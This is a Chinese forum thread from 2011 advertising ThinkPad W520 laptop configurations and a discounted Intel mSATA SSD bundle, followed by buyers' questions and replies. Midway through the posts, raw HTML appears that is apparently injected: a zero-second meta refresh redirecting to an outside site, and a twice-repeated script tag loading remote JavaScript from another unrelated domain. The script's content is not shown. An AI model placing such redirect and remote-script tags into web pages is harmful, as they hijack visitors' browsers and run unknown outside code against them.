开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

极速加急,买W520可半价得INTEL mSATA SSD!(已结束)

型号
销售区域
CPU
主频
内存
配置
硬盘
转速
光驱
显卡
显存
屏幕
分辨率
其他配置单机价
套餐价
降幅
库存状态
W520-38U
美国
详细配置
i7-2720
2.20G

四核
4G
1*4G
500G
7200转
DVDRW
Nvidia+INTEL
1000M+3000
2G
15.6寸宽屏
1600*900
LED背光
蓝牙/摄像头/USB3.0/9芯电池  11500元
  11700元
库存稳定
货源稳定
W520-37U
美国
详细配置
i7-2720
2.20G

四核
8G
2*4G
500G
7200转
DVDRW
1000M+3000
2G
15.6寸宽屏
1920*1080
广色域屏
LED背光
蓝牙/摄像头/指纹/USB3.0/9芯电池  12200元
  12400元
库存稳定
货源稳定
翔意推荐
W520-2QU
美国
详细配置
i7-2720
2.20G

四核
4G
1*4G
500G
7200转
DVDRW
2000M+3000
2G
15.6寸宽屏
1920*1080
广色域屏
LED背光
蓝牙/摄像头/USB3.0/9芯电池  13999元
  14200元
库存稳定
货源稳定
翔意推荐
W520-23U
美国
详细配置
i7-2920XM
2.50G

四核至尊处理器
16G
4*4G
500G
7200转
DVDRW
2000M+3000
2G
15.6寸宽屏
1920*1080
广色域屏
LED背光
蓝牙/指纹/摄像头/USB3.0/较色仪/9芯电池  19800元
  19999元
需预定
源电询

本活动2011年9月1日前有效

翔意公司一直备受高端用户的信赖,也是ThinkPad高端机型销售最好的公司之一。公司推出的活动机型一般也都是性价比较高的中端机型,像T420s,W520这种高端机型很难照顾到。为了表达高端客户多年以来对翔意的支持,从今天起,答谢高端客户的活动开始啦。
在翔意购买W520的客户可以以翔意给力价的半价购买INTEL mSATA 40G SSD。(或者购买80G产品优惠500元现金)
40G半价购买价:490元,80G优惠后特价:1180元。淘宝最低价:40G:900元,80G:1600元
本活动不可与翔意其他优惠活动一起使用。
体验四核i7+高性能专业显卡+SSD配大容量硬盘的超极速体验。

性能:
   容量:40G,80G
    最大读取速率: 170MB/sec,200M(80G)
    最大写入速率: 35MB/sec      70M(80G)
    IOPS:25.000(4KB随机读写)
    平均数据存取时间: 0.1ms

40G80G
翔意给力价:980元
预定超级给力价:880元
翔意给力价:1680元
预定超级给力价:1580元

适用于在售的第二代i系列机型(X1,X220(i),X220T,T420(i),T420s,W520)。翔意免费安装。

目前性能最好,性价比最高的SSD解决方案。
40G容量合理,win7以及常用软件、游戏安装在SSD上体验急速性能,标配硬盘存放个人数据(音乐照片电影之类)。

不到1000提前享受专业级别SSD硬盘,mSATA接口SSD+普通硬盘组合,绝对聪明人的选择。

翔意各店今天开始预定。7月20日到货现货供应,预定给力价哦!

PS:由于mSATA硬盘和内置3G网卡使用同一插槽,因此如果安装了mSATA硬盘,将不能再安装内置3G网卡

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

沙发不留

mSATA绝对是亏本卖,就是为了打破W520系列没有固态硬盘机型的短板。win7评分均超过6.7(1000M显卡)和6.9(2000M显卡)分。

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

我5月份买的的w520~现在可以优惠买这个msata不

预定价880 也不贵啊...  发表于 2011-7-12 10:43
maxthong 发表于 2011-7-12 09:04
我5月份买的的w520~现在可以优惠买这个msata不

抱歉,目前只能说随新机购买的时候才可以
等入手T420了我也加一个
5月份那会入手w520 2qu价格比现在贵不少,现在还不能享受优惠
mSATA SSD 还真是不便宜。
价格很给力,40G硬盘专门放系统很不错
机子要是1000就好了。。。
我预定一块40g的。我刚买的t420s。能给优惠吗?
嘿嘿,同问,刚买的T420s,给优惠不
这次活动是W520专属的,主要刚订了一批W520的货,还在美国发往国内的路上,预先宣传下
SSD的容量太小。但容量上去了,价格也跟着上去了。哎,SSD还是太贵啊。

所以说40G是很合适的容量,装个系统和软件,资料放普通硬盘里,性价比最高的SSD解决方案  发表于 2011-7-12 21:27
还好没急着买、我9月初去买还有这个价么?目前不在北京的说

9月机器肯定会更便宜,数码产品如非特殊情况是不会涨价的。只是这个活动9月肯定结束了。  发表于 2011-7-12 21:31
相当给力啊
我想买个X220T,能享受这个优惠吗?
相当给力啊,嘿嘿
看那个速度不怎么給力啊
lakywind 发表于 2011-7-17 18:08
看那个速度不怎么給力啊

用了就知道了,SSD主要的优势就在于随机读取,而能让我们感觉到快的也是因为SSD的这个参数。(SSD的随机读取速度比普通硬盘快几十倍)

除了拷贝蓝光电影,谁会频繁用到连续读写呢?如果按照连续写入的速度,目前主流SSD和7200转硬盘速度基本是差不多。
回复 EddieFan 的帖子

哦,原来如此,又从大王这学到一条
我的系统盘分了120G,用掉42G,呵呵。如果上SSD,看来要上80G啊

看你都需要装什么了,我的C盘不装WOW的话,40G足够。  发表于 2011-7-17 21:26
回复 friend43 的帖子

装:Window Server 2008 R2 SP1,Maya 2012 64-bit,Houdini 10 64-bit,Houdini 11 64-bit,Office2010 64-bit,RealFlow5,Adobe Master Collection CS5.5,Autodesk MatchMover 2012 64-bit,Autodesk Mudbox 2012 64-bit,Zbrush 4。这些都是大型软件,小软件没算。
friend43 发表于 2011-7-17 22:36
回复 friend43 的帖子

装:Window Server 2008 R2 SP1,Maya 2012 64-bit,Houdini 10 64-bit,Houdini 11 ...

真强啊,是个设计达人吧
23u  会有很多现货?
psliu 发表于 2011-7-20 11:01
23u  会有很多现货?

23U需要预定,其他W520均现货